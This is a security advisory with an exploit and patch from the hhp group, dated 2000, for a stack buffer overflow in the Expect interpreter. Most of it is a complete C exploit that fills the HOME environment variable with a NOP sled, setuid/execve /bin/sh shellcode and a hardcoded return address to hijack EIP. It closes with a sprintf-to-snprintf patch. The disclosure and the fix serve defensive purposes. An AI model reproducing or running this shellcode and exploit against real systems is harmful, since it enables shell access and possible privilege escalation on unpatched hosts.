-------------------------------------------------------------------------------
hhp adv-17 Sec-Advisory/Exploit/Patch
www.hhp-programming.net
-------------------------------------------------------------------------------
Topic: Expect.
Versions: 5.31.8 and 5.28.1, maybe others.
Date: 12/12/2000
Platforms: Tested on Slackware Linux 7.x, maybe others.
Authors: Read credits.
-------------------------------------------------------------------------------
THIS ADVISORY IS BASED UPON SELF TESTING RESULTS. WE DO NOT GARAUNTEE THE IN-
FORMATION STATED BELOW WILL BE CORRECT IN ALL SITUATIONS.
1) BACKGROUND
- Expect.
Expect is a program to control interactive applications. These applications
interactively prompt and expect a user to enter keystrokes in response. By
using Expect, you can write simple scripts to automate these interactions.
2) OVERVIEW
- It is possible to cause Expect to segfault due to impropper bounds checking.
EIP can then be overwritten and the flow of execution changed. It is poss-
ible to exploit any script that uses the the Expect program(Scripting lang).
3) SETBACK
- If an Execpt script is suid/sgid it most likely is not possible to gain the
set privleges due to the execution of Expect before any permission changes
take effect.
4) REPRODUCTION
- If an application is suid/sgid and sets the effective UID or GID withouth
cleaning the environment then calls upon Expect itself or via an Expect
script, it is possible to exploit the Expect scripting interpreter.
5) EXPLOIT
--------------------- SNIP ----------------------------------------------------
/* hhp-expect_smash.c (12/11/00)
*
* expect (/usr/bin/expect) buffer overflow.
* Tested 5.31.8 and 5.28.1, slackware 7.x (Maybe others).
*
* By: isox
* Site: www.hhp-programming.net
* Advisory: www.hhp-programming.net/ouradvisories/hhp-expect_adv%2317.txt
*/
#include <stdio.h>
#include <stdlib.h>
#define NOP 0x90
#define OFFSET 0
#define BUFLEN 416
#define RET 0xbffff580 /* Slackware 7.1 */
#define EXPECT "/usr/bin/expect"
char code[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x66\x31\xc0\x66\x31"
"\xdb\xb0\x2e\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0"
"\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08"
"\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8"
"\xdc\xff\xff\xff/bin/sh\x69";
void usage(char *arg) {
fprintf(stderr, "\nUsage: %s [offset up/down] [eip]\n\n", arg);
fprintf(stderr, "Examples:\n");
fprintf(stderr, "\t%s 347 up -=- Default EIP increased by 347
bytes\n", arg);
fprintf(stderr, "\t%s 347 down -=- Default EIP decreased by 347
bytes\n", arg);
fprintf(stderr, "\t%s 429 up 0x%lx -=- EIP set to 0x%lx and increased by
429 bytes\n", arg, RET, RET + 429);
fprintf(stderr, "\t%s 429 down 0x%lx -=- EIP set to 0x%lx and decreased by
429 bytes\n\n", arg, RET, RET - 429);
exit(1);
}
int main(int argc, char *argv[]) {
char *buf, *p;
long *addressp, address;
int offset=OFFSET;
int i;
if((argc < 3) || (argc > 4))
usage(argv[0]);
if(argc == 3) {
if(!strcmp(argv[2], "up")) {
address = RET + atoi(argv[1]);
printf("Increasing offset by: %d\n", atoi(argv[1]));
printf("Increasing EIP to: 0x%x\n\n", RET + atoi(argv[1]));
}
if(!strcmp(argv[2], "down")) {
address = RET - atoi(argv[1]);
printf("Decreasing offset by: %d\n", atoi(argv[1]));
printf("Decreasing EIP to: 0x%x\n\n", RET - atoi(argv[1]));
}
}
if(argc >= 4) {
if(!strcmp(argv[2], "up")) {
address = strtoul(argv[3], NULL, 16) + atoi(argv[1]);
printf("Setting EIP to: 0x%x\n", strtoul(argv[3], NULL, 16));
printf("Increasing offset by: %d\n", atoi(argv[1]));
printf("Increasing EIP to: 0x%x\n\n", (strtoul(argv[3], NULL, 16) + atoi(
argv[1])));
}
if(!strcmp(argv[2], "down")) {
address = strtoul(argv[3], NULL, 16) + atoi(argv[1]);
printf("Setting EIP to: 0x%x\n", strtoul(argv[3], NULL, 16));
printf("Decreasing offset by: %d\n", atoi(argv[1]));
printf("Decreasing EIP to: 0x%x\n\n", (strtoul(argv[3], NULL, 16) - atoi(
argv[1])));
}
}
if (!(buf = (char *)malloc(BUFLEN))) {
printf("Can't allocate memory.\n");
exit(-1);
}
p = buf;
addressp = (long *) p;
for (i = 0; i < BUFLEN; i+=4) {
*(addressp++) = address;
}
for (i = 0; i < (BUFLEN - strlen(code) - 4); i++) {
buf[i] = NOP;
}
p = buf + (BUFLEN - strlen(code) - 4);
for (i = 0; i < strlen(code); i++)
*(p++) = code[i];
buf[BUFLEN] = '\0';
setenv("HOME", buf, 1);
system(EXPECT);
}
--------------------- SNAP ----------------------------------------------------
6) SOLUTION
- Apply this patch made and tested on version 5.31.8. To apply the patch,
take this snippet out and name it hhp-expect.patch in the expect-5.31 dir-
ectory. Then type... 'patch -p1 < hhp-expect.patch' and finish with a
'make' and a 'make install'
--------------------- SNIP ----------------------------------------------------
--- old/exp_main_sub.c Sun Dec 17 04:01:50 2000
+++ new/exp_main_sub.c Sun Dec 17 04:02:46 2000
@@ -761,14 +761,14 @@
}
}
if (my_rc) {
- char file[200];
+ char file[256];
char *home;
int fd;
char *getenv();
if ((NULL != (home = getenv("DOTDIR"))) ||
(NULL != (home = getenv("HOME")))) {
- sprintf(file,"%s/.expect.rc",home);
+ snprintf(file, 256-1, "%s/.expect.rc", home); // Temporary fix.
if (-1 != (fd = open(file,0))) {
if (TCL_ERROR == (rc = Tcl_EvalFile(interp,file))) {
expErrorLog("error executing file: %s\r\n",file);
--------------------- SNAP ----------------------------------------------------
7) CREDITS
- Ben Lull (isox) (plix@chainsawbeer.com) - Bug finding, exploit, testing.
- Cody Tubbs (loophole) (pigspigs@yahoo.com) - Advisory, patch, testing.